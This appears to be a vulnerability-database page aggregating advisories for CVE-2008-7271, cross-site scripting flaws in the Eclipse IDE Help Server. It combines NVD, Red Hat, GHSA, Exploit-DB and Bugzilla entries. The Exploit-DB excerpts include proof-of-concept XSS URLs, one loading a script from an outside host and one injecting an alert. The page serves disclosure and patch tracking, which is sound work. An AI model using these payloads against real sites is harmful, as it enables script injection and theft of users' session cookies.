CVE-2008-7271
published 2011-01-13CVE-2008-7271: Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote…
PriorityP419medium4.3CVSS 2.0
AVNACMAuNCNIPAN
EXPLOIT
EPSS
1.90%
77.1th percentile
Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| eclipse | eclipse_ide | — | — |
CVSS provenance
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
vendor_redhat4.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Red Hat
eclipse: Help Content web application vulnerable to multiple XSS flaws
vendor_redhat·2008-04-24·CVSS 4.3
CVE-2008-7271 [MEDIUM] CWE-79 eclipse: Help Content web application vulnerable to multiple XSS flaws
eclipse: Help Content web application vulnerable to multiple XSS flaws
Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.
Package: eclipse (Red Hat Enterprise Linux 5) - Will not fix
Package: eclipse (Red Hat Enterprise Linux 6) - Not affected
GHSA
GHSA-rpmq-jrch-356w: Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3
ghsa_unreviewed·2022-05-17·CVSS 4.3
CVE-2008-7271 [MEDIUM] CWE-79 GHSA-rpmq-jrch-356w: Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3
Multiple cross-site scripting (XSS) vulnerabilities in the Help Contents web application (aka the Help Server) in Eclipse IDE, possibly 3.3.2, allow remote attackers to inject arbitrary web script or HTML via (1) the searchWord parameter to help/advanced/searchView.jsp or (2) the workingSet parameter in an add action to help/advanced/workingSetManager.jsp, a different issue than CVE-2010-4647.
No detection rules found.
Exploit-DB
Eclipse 3.3.2 IDE - 'Help Server help/advanced/workingSetManager.jsp?workingSet' Cross-Site Scripting
exploitdb·2008-04-24
CVE-2008-7271 Eclipse 3.3.2 IDE - 'Help Server help/advanced/workingSetManager.jsp?workingSet' Cross-Site Scripting
Eclipse 3.3.2 IDE - 'Help Server help/advanced/workingSetManager.jsp?workingSet' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/45921/info
Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Eclipse IDE 3.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/help/advanced/workingSetManager.jsp?operation=add&workingSet='%3E%3Cscript%20src%3D'http%3A%2F%2F1.2.3.4%2Fa.js'%3E%3C%2Fscript%3E
&hrefs=%2Fcom.adobe.flexbuilder.help.
Exploit-DB
Eclipse 3.3.2 IDE - 'Help Server help/advanced/searchView.jsp?SearchWord' Cross-Site Scripting
exploitdb·2008-04-24
CVE-2008-7271 Eclipse 3.3.2 IDE - 'Help Server help/advanced/searchView.jsp?SearchWord' Cross-Site Scripting
Eclipse 3.3.2 IDE - 'Help Server help/advanced/searchView.jsp?SearchWord' Cross-Site Scripting
---
source: https://www.securityfocus.com/bid/45921/info
Eclipse IDE is prone to multiple cross-site-scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Eclipse IDE 3.3.2 is vulnerable; other versions may also be affected.
http://www.example.com/help/advanced/searchView.jsp?searchWord=a");}alert('xss');
Bugzilla
CVE-2008-7271 eclipse: Help Content web application vulnerable to multiple XSS flaws
bugzilla·2011-01-19·CVSS 4.3
CVE-2008-7271 [MEDIUM] CVE-2008-7271 eclipse: Help Content web application vulnerable to multiple XSS flaws
CVE-2008-7271 eclipse: Help Content web application vulnerable to multiple XSS flaws
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-7271 to
the following vulnerability:
Name: CVE-2008-7271
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-7271
Assigned: 20110113
Reference: MISC: http://r00tin.blogspot.com/2008/04/eclipse-local-web-server-exploitation.html
Reference: MISC: https://bugs.eclipse.org/bugs/show_bug.cgi?id=223539
Multiple cross-site scripting (XSS) vulnerabilities in the Help
Contents web application (aka the Help Server) in Eclipse IDE,
possibly 3.3.2, allow remote attackers to inject arbitrary web script
or HTML via (1) the searchWord parameter to
help/advanced/searchView.jsp or (2) the workingSet parameter in an add
action to help/advanced/w
Bugzilla
CVE-2010-4647 eclipse: Help Content web application vulnerable to multiple XSS
bugzilla·2010-12-09·CVSS 4.3
CVE-2010-4647 [MEDIUM] CVE-2010-4647 eclipse: Help Content web application vulnerable to multiple XSS
CVE-2010-4647 eclipse: Help Content web application vulnerable to multiple XSS
It was reported [1] that the Eclipse Help Contents were vulnerable to Cross Site Scripting vulnerabilities in the /help/index.jsp and /help/advanced/content.jsp URLs that are served by the built-in Jetty Web Server plugin.
There is an upstream bug [2] and according to the reporter, this is corrected upstream (as of nightlies dating back to 20101110).
[1] http://yehg.net/lab/pr0js/advisories/eclipse/%5Beclipse_help_server%5D_cross_site_scripting
Discussion:
Upstream bug is here: https://bugs.eclipse.org/bugs/show_bug.cgi?id=329582
---
This has been assigned the name CVE-2010-4647:
http://article.gmane.org/gmane.comp.security.oss.general/4059
---
How do I trigger the bug actually?
Using Eclipse 3.5.2 fr
2011-01-13
Published